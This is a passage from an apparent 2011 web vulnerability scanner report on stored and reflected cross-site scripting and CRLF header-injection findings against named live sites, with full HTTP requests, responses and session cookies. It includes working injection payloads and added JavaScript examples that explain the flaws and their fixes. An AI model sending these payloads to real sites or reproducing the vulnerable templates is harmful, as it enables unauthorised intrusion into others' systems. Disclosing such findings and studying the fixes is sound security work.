Set-Cookie: ar_2fda59a1d239f5ba&#41;!&#40;sn=exp=1&initExp=Tue Apr 26 18:36:18 2011&recExp=Tue Apr 26 18:36:18 2011&prad=296638382&arc=200925855&; expires=Mon 25-Jul-2011 18:36:18 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1303842978; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 9

/*error*/

3. Cross-site scripting (stored)

Summary

Severity:   High
Confidence:   Certain
Host:   https://ecommerce.randomhouse.com
Path:   //account.do

Issue detail

The value of the email request parameter submitted to the URL /create-account-submit.do is copied into the HTML document as plain text between tags at the URL //account.do. The payload 2559e<script>alert(1)</script>8523ef6493d was submitted in the email parameter. This input was returned unmodified in a subsequent request for the URL //account.do.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request 1

POST /create-account-submit.do HTTP/1.1
Host: ecommerce.randomhouse.com
Connection: keep-alive
Referer: https://ecommerce.randomhouse.com/create-account-submit.do
Cache-Control: max-age=0
Origin: https://ecommerce.randomhouse.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RES_TRACKINGID=686529694590717; __qca=P0-874375948-1303855562358; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; s_cc=true; s_sq=%5B%5BB%5D%5D; SC_LINKS=%5B%5BB%5D%5D; JSESSIONID=916E1DF250E4C8F9A222E994DF92BDD0.ecommerce_wrk1; rhecommerce='"--></style></script><script>netsparker(0x000B6E)</script>|null|www.randomhouse.com|3; mbox=session#1303855598284-166145#1303859918|PC#1303855598284-166145#1366930058|check#true#1303858118; CP=null*; RES_SESSIONID=212207240983843; ResonanceSegment=1
Content-Length: 274

shippingAddress=useBillingAddress&email=%27%40%27.com2559e<script>alert(1)</script>8523ef6493d&firstName=llkk+kkk&lastName=kkk+&company=&street1=123+mmm+st+&street2=&city=new+york&stateProvince=NY&country=US&zipPostalCode=10010&phoneNumber=999-988-0987&faxNumber=&password=1234rf&confirmPasswor
...[SNIP]...

Request 2

GET //account.do HTTP/1.1
Host: ecommerce.randomhouse.com
Connection: keep-alive
Referer: https://ecommerce.randomhouse.com/create-account-submit.do
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RES_TRACKINGID=686529694590717; __qca=P0-874375948-1303855562358; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; s_cc=true; s_sq=%5B%5BB%5D%5D; SC_LINKS=%5B%5BB%5D%5D; JSESSIONID=916E1DF250E4C8F9A222E994DF92BDD0.ecommerce_wrk1; rhecommerce='"--></style></script><script>netsparker(0x000B6E)</script>|null|www.randomhouse.com|3; mbox=session#1303855598284-166145#1303859918|PC#1303855598284-166145#1366930058|check#true#1303858118; CP=null*; RES_SESSIONID=212207240983843; ResonanceSegment=1

Response 2

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:50:34 GMT
Server: Apache
Content-Type: text/html;charset=ISO-8859-1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 17132


<!-- account.vm -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www
...[SNIP]...
<span class="loggedInText">'@'.com2559e<script>alert(1)</script>8523ef6493d</span>
...[SNIP]...

4. HTTP header injection
There are 4 instances of this issue:


4.1. http://ad.uk.doubleclick.net/adj/new.computerworlduk.com/security1 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.uk.doubleclick.net
Path:   /adj/new.computerworlduk.com/security1

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 8d4c5%0d%0a27bb07a4caf was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /8d4c5%0d%0a27bb07a4caf/new.computerworlduk.com/security1;kw=news,NULL,NULL,;sz=250x250,300x250,336x280;tile=2;ord=1303854538291? HTTP/1.1
Host: ad.uk.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.computerworlduk.com/news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/?olo=rss
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/8d4c5
27bb07a4caf
/new.computerworlduk.com/security1;kw=news,NULL,NULL,;sz=250x250,300x250,336x280;tile=2;ord=1303854538291:
Date: Tue, 26 Apr 2011 21:51:14 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.2. http://ad.uk.doubleclick.net/adj/new.computerworlduk.com/security2 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.uk.doubleclick.net
Path:   /adj/new.computerworlduk.com/security2

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 95a76%0d%0a26ff575b102 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /95a76%0d%0a26ff575b102/new.computerworlduk.com/security2;kw=news,NULL,NULL,;sz=250x250,300x250,336x280;tile=3;ord=1303854538291? HTTP/1.1
Host: ad.uk.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.computerworlduk.com/news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/?olo=rss
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/95a76
26ff575b102
/new.computerworlduk.com/security2;kw=news,NULL,NULL,;sz=250x250,300x250,336x280;tile=3;ord=1303854538291:
Date: Tue, 26 Apr 2011 21:51:20 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.3. http://widgetserver.com/syndication/get_widget.js [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgetserver.com
Path:   /syndication/get_widget.js

Issue detail

The value of the callback request parameter is copied, URL-decoded, into the Location header of the 302 redirect to cdn.widgetserver.com. The payload 8079d%0d%0a98a5ae34c96 was submitted in the callback parameter; the CR LF it decodes to ends the Location field, so 98a5ae34c96 is emitted as a new header line under the requester's control.

Request

GET /syndication/get_widget.js?callback=8079d%0d%0a98a5ae34c96&output=json&location=http%3A%2F%2Fwww.aac.org%2Fsite%2FTR%2FEvents%2FAWB08%3Fpg%3Dteam%26fr_id%3D1110%26team_id%3D24880&timestamp=1303854282405&appId.0=9dc88731-b2ec-4909-9bc6-b15b8881219b HTTP/1.1
Host: widgetserver.com
Proxy-Connection: keep-alive
Referer: http://www.aac.org/site/TR/Events/AWB08?pg=team&fr_id=1110&team_id=24880
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 26 Apr 2011 21:44:34 GMT
Server: Apache/2.2.3 (Red Hat)
Location: http://cdn.widgetserver.com/syndication/json/i/9dc88731-b2ec-4909-9bc6-b15b8881219b/iv/2/n/code/nv/4/p/1/r/a5eaf8f4-5bfb-4aa0-9d12-1707dde89c3e/rv/52/t/095ceb1aff68cc1170437fc8a7c33749a6e5729d0000012f8b0da168/u/1/?callback=8079d
98a5ae34c96

Vary: Accept-Encoding
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Connection: close
Content-Type: application/x-javascript
Content-Length: 0


4.4. http://www.widgetserver.com/syndication/get_widget.js [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.widgetserver.com
Path:   /syndication/get_widget.js

Issue detail

The value of the callback request parameter is copied into the Location response header. The payload a292f%0d%0ad3fe71315d0 was submitted in the callback parameter. This caused a response containing an injected HTTP header.

Request

GET /syndication/get_widget.js?callback=a292f%0d%0ad3fe71315d0&output=json&location=http%3A%2F%2Fwww.widgetbox.com%2Flist%2Fmost_popular&timestamp=1303854385556&appId.0=077f25c8-0348-4215-9539-57b2ff17f13b HTTP/1.1
Host: www.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://www.widgetbox.com/list/most_popular
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 26 Apr 2011 21:46:18 GMT
Server: Apache/2.2.3 (Red Hat)
Location: http://cdn.widgetserver.com/syndication/json/i/077f25c8-0348-4215-9539-57b2ff17f13b/iv/15/n/code/nv/4/p/2/r/621004a9-a717-4271-bd6a-b454b74a1d68/rv/101/t/0ecb188b389ef47932686132b264ecdcbd658d2a0000012f8ab32f74/u/2/?callback=a292f
d3fe71315d0

Vary: Accept-Encoding
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Connection: close
Content-Type: application/x-javascript
Content-Length: 0
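
The mechanism behind the four findings in this section, as an added example that is not part of the scanner report: the payload from 4.1 is URL-decoded into the Location header, and a CR LF inside a header value ends that field and starts a new one. The redirect base URL and the header-building functions are assumptions for illustration; the payload is the one shown in 4.1.

```javascript
// Added example (not from the report or the ad server): how a CR/LF inside a
// URL path segment turns one Location header into two, and two ways to stop it.
// BASE and the three builders are assumptions for illustration; PAYLOAD_4_1 is
// the value the report shows for finding 4.1.

const BASE = 'http://static.2mdn.net/';
const PAYLOAD_4_1 = '8d4c5%0d%0a27bb07a4caf'; // as submitted in REST URL parameter 1

// Vulnerable: decode the path segment and paste it straight into the header value.
// decodeURIComponent turns %0d%0a into "\r\n", the HTTP header line terminator.
function naiveLocation(segment) {
  return 'Location: ' + BASE + decodeURIComponent(segment);
}

// Hardened (a): re-encode the segment so CR and LF stay as %0D%0A on the wire.
// The redirect still works; the reserved characters just never become bytes.
function encodedLocation(segment) {
  return 'Location: ' + BASE + encodeURIComponent(decodeURIComponent(segment));
}

// Hardened (b): refuse any header value that contains a control character.
// RFC 7230 field-content permits no CR, LF or NUL, so rejecting is always safe.
function strictLocation(segment) {
  const value = BASE + decodeURIComponent(segment);
  if (/[\r\n\0]/.test(value)) {
    throw new RangeError('control character in header value');
  }
  return 'Location: ' + value;
}

// Split a response head the way an HTTP parser does: one field per line.
// A second element appearing for a single Location header is exactly the
// symptom the scanner reports as "an injected HTTP header".
function headerLines(head) {
  return head.split(/\r?\n/).filter((line) => line.length > 0);
}
```

Node's own http module refuses such values: ServerResponse.setHeader('Location', value) throws ERR_INVALID_CHAR when value contains CR or LF, so the naive variant is only reachable where the header is written by hand or by a layer that bypasses that check. Re-encoding (encodedLocation) is the fix that keeps the redirect working; rejecting the request (strictLocation) is the safer default when the segment is never expected to contain reserved characters.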


5. Cross-site scripting (reflected)
There are 266 instances of this issue:


5.1. http://ad.doubleclick.net/adi/N2886.151350.QUANTCAST.COM/B5403001.14 [labels parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2886.151350.QUANTCAST.COM/B5403001.14

Issue detail

The value of the labels request parameter is copied into a JavaScript string which is encapsulated in double quotation marks (the click-through URL that the ad's inline script assigns with var url = escape("...")). The payload 139d0"-alert(1)-"6aa7e702a5c was submitted in the labels parameter and was echoed unmodified in the application's response: the first " closes the string literal, -alert(1)- is then parsed as a subtraction expression and executes, and the trailing " reopens a string literal so the statement stays syntactically valid and the rest of the script still runs.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N2886.151350.QUANTCAST.COM/B5403001.14;sz=728x90;ord=98489;click=http://exch.quantserve.com/r?a=p-03tSqaTFVs1ls&labels=_qc.clk,_click.adserver.rtb139d0"-alert(1)-"6aa7e702a5c&rtbip=74.217.61.146&rtbdata2=EAUaDk1ldHJvUENTX1EyLTExILgLKKgXMM3bHjonaHR0cDovL21pY3Jvc29mdGFkdmVydGlzaW5nZXhjaGFuZ2UuY29tQgcIx9QHEPUBUAFaKG9lZldzNkhsanVLNDU5S3dyTFdhdDZHMGdyZTR1NEszODdRdk1zRkRoG3UCFdE9gAH3h70lkAHXywegAQGoAe3TB7ABAg&redirecturl2=;ord=98489? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=REAB01&cb=1243611902
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 26 Apr 2011 18:40:31 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7121

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
/click%3Bh%3Dv8/3af5/f/163/%2a/f%3B240320616%3B0-0%3B0%3B62289812%3B3454-728/90%3B41844250/41862037/1%3B%3B%7Esscs%3D%3fhttp://exch.quantserve.com/r?a=p-03tSqaTFVs1ls&labels=_qc.clk,_click.adserver.rtb139d0"-alert(1)-"6aa7e702a5c&rtbip=74.217.61.146&rtbdata2=EAUaDk1ldHJvUENTX1EyLTExILgLKKgXMM3bHjonaHR0cDovL21pY3Jvc29mdGFkdmVydGlzaW5nZXhjaGFuZ2UuY29tQgcIx9QHEPUBUAFaKG9lZldzNkhsanVLNDU5S3dyTFdhdDZHMGdyZTR1NEszODdRdk1zRkRoG3UCFdE
...[SNIP]...
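
All findings in this section share one sink: the parameter lands inside a double-quoted JavaScript string literal, here the argument of escape("...") that builds the click-through URL. The following is an added example, not code from the report or from the ad server, that reproduces the break-out with the payload from 5.1 in a sandbox and shows the output encoding that closes it. The server-side template and the runner are assumptions for illustration; escape is stubbed to the identity so the assigned value stays readable.

```javascript
// Added example (not from the report or the ad server): why the payload from
// finding 5.1 executes when reflected into a double-quoted JS string literal,
// and what correct output encoding for that context looks like. The template
// mirrors the `var url = escape("...")` statement visible in the responses;
// renderNaive/renderSafe/run are assumptions for illustration.

const PAYLOAD_5_1 = '139d0"-alert(1)-"6aa7e702a5c';

// Vulnerable: the parameter is concatenated into the string literal verbatim.
function renderNaive(clickUrl) {
  return 'var url = escape("' + clickUrl + '");';
}

// Hardened: JSON.stringify yields a valid JS string literal for any input
// (quotes, backslashes and newlines become escape sequences). "</" is escaped
// as well so the value can never close the enclosing <script> element, and
// U+2028/U+2029 are escaped for engines that treat them as line terminators.
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/<\//g, '<\\/')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

function renderSafe(clickUrl) {
  return 'var url = escape(' + jsStringLiteral(clickUrl) + ');';
}

// Run the generated statement with alert() replaced by a recorder and escape()
// replaced by the identity. Returns how often alert fired and what `url` holds.
function run(source) {
  const alerts = [];
  const fn = new Function('alert', 'escape', source + '\nreturn url;');
  const url = fn((x) => { alerts.push(x); return x; }, (s) => s);
  return { alerts, url };
}
```

With the naive template the statement becomes escape("139d0"-alert(1)-"6aa7e702a5c"): the two quoted fragments and alert(1) are operands of a subtraction, so alert fires and url ends up as NaN. With renderSafe the literal reads "139d0\"-alert(1)-\"6aa7e702a5c" and url holds the original value. JSON.stringify alone is not enough in an inline script because it leaves </script> intact, which is why jsStringLiteral also escapes "</".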

5.2. http://ad.doubleclick.net/adi/N2886.151350.QUANTCAST.COM/B5403001.14 [redirecturl2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2886.151350.QUANTCAST.COM/B5403001.14

Issue detail

The value of the redirecturl2 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload db356"-alert(1)-"f49aabc7bfe was submitted in the redirecturl2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N2886.151350.QUANTCAST.COM/B5403001.14;sz=728x90;ord=98489;click=http://exch.quantserve.com/r?a=p-03tSqaTFVs1ls&labels=_qc.clk,_click.adserver.rtb&rtbip=74.217.61.146&rtbdata2=EAUaDk1ldHJvUENTX1EyLTExILgLKKgXMM3bHjonaHR0cDovL21pY3Jvc29mdGFkdmVydGlzaW5nZXhjaGFuZ2UuY29tQgcIx9QHEPUBUAFaKG9lZldzNkhsanVLNDU5S3dyTFdhdDZHMGdyZTR1NEszODdRdk1zRkRoG3UCFdE9gAH3h70lkAHXywegAQGoAe3TB7ABAg&redirecturl2=db356"-alert(1)-"f49aabc7bfe HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=REAB01&cb=1243611902
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 26 Apr 2011 18:41:30 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6794

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
TX1EyLTExILgLKKgXMM3bHjonaHR0cDovL21pY3Jvc29mdGFkdmVydGlzaW5nZXhjaGFuZ2UuY29tQgcIx9QHEPUBUAFaKG9lZldzNkhsanVLNDU5S3dyTFdhdDZHMGdyZTR1NEszODdRdk1zRkRoG3UCFdE9gAH3h70lkAHXywegAQGoAe3TB7ABAg&redirecturl2=db356"-alert(1)-"f49aabc7bfehttp://www.metropcs.com/cell-phone-plans");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
v
...[SNIP]...

5.3. http://ad.doubleclick.net/adi/N2886.151350.QUANTCAST.COM/B5403001.14 [rtbdata2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2886.151350.QUANTCAST.COM/B5403001.14

Issue detail

The value of the rtbdata2 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4f143"-alert(1)-"667d895dc3f was submitted in the rtbdata2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N2886.151350.QUANTCAST.COM/B5403001.14;sz=728x90;ord=98489;click=http://exch.quantserve.com/r?a=p-03tSqaTFVs1ls&labels=_qc.clk,_click.adserver.rtb&rtbip=74.217.61.146&rtbdata2=EAUaDk1ldHJvUENTX1EyLTExILgLKKgXMM3bHjonaHR0cDovL21pY3Jvc29mdGFkdmVydGlzaW5nZXhjaGFuZ2UuY29tQgcIx9QHEPUBUAFaKG9lZldzNkhsanVLNDU5S3dyTFdhdDZHMGdyZTR1NEszODdRdk1zRkRoG3UCFdE9gAH3h70lkAHXywegAQGoAe3TB7ABAg4f143"-alert(1)-"667d895dc3f&redirecturl2=;ord=98489? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=REAB01&cb=1243611902
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 26 Apr 2011 18:41:14 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7121

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
AUaDk1ldHJvUENTX1EyLTExILgLKKgXMM3bHjonaHR0cDovL21pY3Jvc29mdGFkdmVydGlzaW5nZXhjaGFuZ2UuY29tQgcIx9QHEPUBUAFaKG9lZldzNkhsanVLNDU5S3dyTFdhdDZHMGdyZTR1NEszODdRdk1zRkRoG3UCFdE9gAH3h70lkAHXywegAQGoAe3TB7ABAg4f143"-alert(1)-"667d895dc3f&redirecturl2=http%3a%2f%2fwww.metropcs.com/android%3Futm_source%3DDART%26utm_medium%3DDisplay%252BMedia%26utm_campaign%3DMPCS%252BGM%252BQ2%252BInterim%252B%285403001%29");
var fscUrl = url;
var fsc
...[SNIP]...

5.4. http://ad.doubleclick.net/adi/N2886.151350.QUANTCAST.COM/B5403001.14 [rtbip parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2886.151350.QUANTCAST.COM/B5403001.14

Issue detail

The value of the rtbip request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7cdb3"-alert(1)-"210cce18065 was submitted in the rtbip parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N2886.151350.QUANTCAST.COM/B5403001.14;sz=728x90;ord=98489;click=http://exch.quantserve.com/r?a=p-03tSqaTFVs1ls&labels=_qc.clk,_click.adserver.rtb&rtbip=74.217.61.1467cdb3"-alert(1)-"210cce18065&rtbdata2=EAUaDk1ldHJvUENTX1EyLTExILgLKKgXMM3bHjonaHR0cDovL21pY3Jvc29mdGFkdmVydGlzaW5nZXhjaGFuZ2UuY29tQgcIx9QHEPUBUAFaKG9lZldzNkhsanVLNDU5S3dyTFdhdDZHMGdyZTR1NEszODdRdk1zRkRoG3UCFdE9gAH3h70lkAHXywegAQGoAe3TB7ABAg&redirecturl2=;ord=98489? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=REAB01&cb=1243611902
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 26 Apr 2011 18:40:50 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6812

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
/f/163/%2a/r%3B240320616%3B1-0%3B0%3B62289812%3B3454-728/90%3B41885373/41903160/1%3B%3B%7Esscs%3D%3fhttp://exch.quantserve.com/r?a=p-03tSqaTFVs1ls&labels=_qc.clk,_click.adserver.rtb&rtbip=74.217.61.1467cdb3"-alert(1)-"210cce18065&rtbdata2=EAUaDk1ldHJvUENTX1EyLTExILgLKKgXMM3bHjonaHR0cDovL21pY3Jvc29mdGFkdmVydGlzaW5nZXhjaGFuZ2UuY29tQgcIx9QHEPUBUAFaKG9lZldzNkhsanVLNDU5S3dyTFdhdDZHMGdyZTR1NEszODdRdk1zRkRoG3UCFdE9gAH3h70lkAHXywegAQG
...[SNIP]...

5.5. http://ad.doubleclick.net/adi/N2886.151350.QUANTCAST.COM/B5403001.14 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2886.151350.QUANTCAST.COM/B5403001.14

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c32f1"-alert(1)-"34398203435 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N2886.151350.QUANTCAST.COM/B5403001.14;sz=728x90;ord=98489;click=http://exch.quantserve.com/r?a=p-03tSqaTFVs1lsc32f1"-alert(1)-"34398203435&labels=_qc.clk,_click.adserver.rtb&rtbip=74.217.61.146&rtbdata2=EAUaDk1ldHJvUENTX1EyLTExILgLKKgXMM3bHjonaHR0cDovL21pY3Jvc29mdGFkdmVydGlzaW5nZXhjaGFuZ2UuY29tQgcIx9QHEPUBUAFaKG9lZldzNkhsanVLNDU5S3dyTFdhdDZHMGdyZTR1NEszODdRdk1zRkRoG3UCFdE9gAH3h70lkAHXywegAQGoAe3TB7ABAg&redirecturl2=;ord=98489? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=REAB01&cb=1243611902
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 26 Apr 2011 18:40:16 GMT
